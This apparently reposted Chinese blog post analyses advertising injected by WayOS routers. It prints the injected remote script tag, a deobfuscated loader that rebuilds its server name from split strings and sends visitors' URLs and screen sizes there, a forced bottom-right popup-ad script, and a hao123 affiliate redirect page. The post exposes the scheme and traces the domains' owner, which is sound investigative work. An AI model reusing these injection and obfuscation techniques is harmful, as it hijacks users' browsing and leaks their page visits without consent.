• wayos 最新右下角窗口广告.

    打开任何网站,查看源代码,在html网页文件底部插入一行JS代码:

    <script type="text/javascript" src="http://n.cosbot.cn/rb/i7.js"></script>

     解析后得到源代码片段

    (function(d) {
	function $a(p) {
		try {
			var x = d.getElementsByTagName("head")[0];
			var y = x.appendChild($s(p));
			setTimeout(function() {
				x.removeChild(y)
			}, 2000)
		} catch (e) {}
	}
	function $c(n) {
		return d.createElement(n)
	}
	function $s(p) {
		var j = $c("script");
		j.src = p;
		j.async = true;
		j.type = "text/javascript";
		return j
	}
	var amt = 0;

	function $rn() {
		var ww = d.body.clientWidth;
		var hh = d.body.clientHeight;
		var u = {
			j: "ht",
			c: "com.cn",
			q: "tp:",
			m: "b.",
			n: "wdzs",
			d: "a."
		};
		var be = u.j + u.q + "//" + u.d + u.n + u.m + u.c;
		var en = escape(window.location.href) + "&a=" + Math.random() + "&w=" + ww + "&h=" + hh;
		if (top == this) {
			if (ww < 300 || hh < 40) {
				amt += 1;
				if (amt < 3) {
					setTimeout($rn, 1000)
				} else {
					$a(be + "/fmt7p/m.php?u=" + en)
				}
			} else {
				$a(be + "/fmt7p/?u=" + en)
			}
		}
	}
	setTimeout($rn, 500)
})(document);

     这段JS的作用是执行一个动态的js,源代码拼接后如下

    http://a.wdzsb.com.cn/fmt7p/?u=http://www.wmdfw.com/baidu.php&a=0.3494681795691035&w=1349&h=3174

     作用是将变量u,a,w,h几个参数传递给JS.直接访问后可以得到源代码片段

    (function(w, d) {
	var gid = "bd_uuid_rb_111268";

	function $c(n) {
		return d.createElement(n)
	}
	function $show() {
		var e = d.getElementById(gid);
		if (e) {
			e.style.display = "block"
		}
	}
	function $isdone() {
		var e = d.getElementById(gid);
		if (e) {
			return true
		}
		return false
	}
	function $rm() {
		var e = d.getElementById(gid);
		if (e) {
			e.style.display = "none"
		}
		setTimeout($del, 10000)
	}
	function $del() {
		var e = d.getElementById(gid);
		if (e) {
			e.parentNode.removeChild(e)
		}
	}
	function $drn() {
		if ($isdone()) {
			return
		}
		var l = $c("div");
		l.id = gid;
		l.style.display = "none";
		l.oncontextmenu = function() {
			return false
		};
		l = d.body.appendChild(l);
		var isIE6 = w.navigator.userAgent.match(/MSIE 6/ig) && !w.navigator.userAgent.match(/MSIE 7|8/ig);
		var sty = "";
		if (isIE6) {
			sty = "BORDER-RIGHT: 0px; BORDER-TOP: 0px; DISPLAY: block; Z-INDEX: 2147483647; RIGHT: 0px; padding:0;MARGIN: 0px; 

BORDER-LEFT: 0px; WIDTH: 300px; BOTTOM: auto; BORDER-BOTTOM: 0px; POSITION: absolute; TOP: expression(eval

((document.documentElement&&document.documentElement.scrollTop||

document.body.scrollTop)+(document.documentElement&&document.documentElement.clientHeight||document.body.clientHeight)-this.offsetHeight-0)); 

HEIGHT: 250px; BACKGROUND-COLOR: #ecf9fd; TEXT-ALIGN: left"
		} else {
			sty = "display: block; position: fixed; padding: 0px; margin: 0px; border: 0px none;text-align: left; z-index: 

2147483647;  300px; height: 250px; right: 0px; bottom: 0px; top: auto;"
		}
		var k = $c("div");
		k.style.cssText = sty;
		k = l.appendChild(k);
		k.innerHTML = "<span style="position:absolute;42px;height:14px;line-height:20px;right:0px;top:-

14px;cursor:pointer;text-align:right;display:block;background: url(http://dl.katman.cn/img/close.gif) 0px 0px no-repeat scroll;" onmouseover=

"this.style.backgroundPosition='0 -20px';" onmouseout="this.style.backgroundPosition='0 0';" onclick="javascript:var 

e=document.getElementById('bd_uuid_rb_111268');if(!e)return;e.style.display='none';setTimeout(function(){var e=document.getElementById

('bd_uuid_rb_111268');if(e){e.parentNode.removeChild(e)}},10000);"></span>";
		var ifr = $c("iframe");
		ifr.scrolling = "no";
		ifr.marginWidth = "0";
		ifr.marginHeight = "0";
		ifr.frameBorder = "0";
		ifr.height = "250px";
		ifr.width = "300px";
		ifr = k.appendChild(ifr);
		var ul = "http://dl.katman.cn/cl/html/fmt7p.html";
		try {
			var doc = ifr.contentWindow.document;
			doc.open().write('<body onload="javascript:' + "window.location.href='" + ul + "';">");
			doc.close()
		} catch (e) {
			ifr.src = ul
		}
	}
	function $dly() {
		$drn();
		setTimeout($show, 2000);
		setTimeout($rm, 1000 * 1800)
	}
	if (!window._fmt_done_pg) {
		window._fmt_done_pg = 1;
		setTimeout($dly, 50)
	}
})(window, document);

     主要展示http://dl.katman.cn/cl/html/fmt7p.html地址的右下角窗口广告
    因此不难看出域名

    n.cosbot.cn
a.wdzsb.com.cn
dl.katman.cn

     打开站长之家http://tool.chinaz.com/,查询到这三个域名均为成都西维数码科技有限公司 郑清华所有

    与每次wayos偷偷换广告地址所有者完全一致

    http://n.cosbot.cn/cl/html/hao.html

    <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="0">
<title>hao123_上网从这里开始</title>
</head>
<body>
<script>
(function(d){
function isCkie(){
    var isSupport=false;
    if(typeof(navigator.cookieEnabled)!='undefined'){
        isSupport=navigator.cookieEnabled;
	}
	return isSupport;
}
//Cookie相关函数
var sCkie=new function(){
//过期时间
this.expTime=function(millisecond){if(millisecond.length==0){millisecond=0};var exp=new Date();exp.setTime(exp.getTime()+parseInt(millisecond));return exp.toGMTString();};
//创建cookie
this.add=function(name,value,expires,path,domain,secure){d.cookie=name+"="+encodeURI(value)+(expires?(';expires='+expires):'')+(path?(';path='+path):'')+(domain?(';domain='+domain):'')+((secure)?';secure':'');};
//删除cookie
//this.del=function(name,path,domain){if(getCookie(name)){document.cookie=name+"="+((path)?(";path="+path):'')+((domain)?(";domain="+domain):'')+";expires=Mon,01-Jan-2006 00:00:01 GMT";}};
//获取cookie
this.get=function(name){var arg=name+"=";var alen=arg.length;var theCookie=''+d.cookie;var inCookieSite=theCookie.indexOf(arg);if(inCookieSite==-1||name==""){return '';}var begin=inCookieSite+alen;var end=theCookie.indexOf(';',begin);if(end==-1){end=theCookie.length;}return decodeURI(theCookie.substring(begin,end));};
};
var gUrl;
if(isCkie()){
	var ckie=0;
	var sid='lpvt_eef100d08ffffab743f371e2d5729249';
	var skie=sCkie.get(sid);
	if (skie!='')
	{
		ckie=parseInt(skie);
	}
	if(ckie<1){
		var rand=Math.random();
		if(rand<1.8){
			gUrl="https://www.hao123.com/?tn=90826472_hao_pg";
		}else{
			gUrl="https://www.hao123.com/";
		}
		sCkie.add(sid,'1',sCkie.expTime(1*60*60*1000),0,0,0);
	}else{
		gUrl="https://www.hao123.com/";
	}
}else{
	gUrl="https://www.hao123.com/";
}
(function(u){if(window.navigate&&typeof navigate=='function')navigate(u);var ua=navigator.userAgent;if(ua.match(/applewebkit/i)){var h = document.createElement('a');h.rel='noreferrer';h.href=u;document.body.appendChild(h);var evt=document.createEvent('MouseEvents');evt.initEvent('click', true,true);h.dispatchEvent(evt);}else{document.write('<meta http-equiv="Refresh" Content="0; Url='+u+'" >');}})(gUrl);
})(document);
</script>
</body>
</html>

     51.la统计id:15820612
    根据统计代码分析,广东地区为重灾区
  • 相关阅读:
    java学习(19-IO高级)
    java学习(18-异常)
    java学习(17-Map和Set)
    java学习笔记(16-集合)
    java学习笔记(15-高级api)
    java学习笔记(14-包和权限修饰符)
    Deno文件处理详解:如何写入文件、如何读文件、如何创建删除以及检查文件和目录。
    2020年12月8日建站随笔:IPlayIO中文网从上线到现在的一些总结
    2020 FreeBSD如何更换国内仓库源
    推荐11个值得研究学习的Python开源项目(从入门到python高级开发)
  • 原文地址:https://www.cnblogs.com/zhouein/p/5581699.html
Copyright © 2020-2023  润新知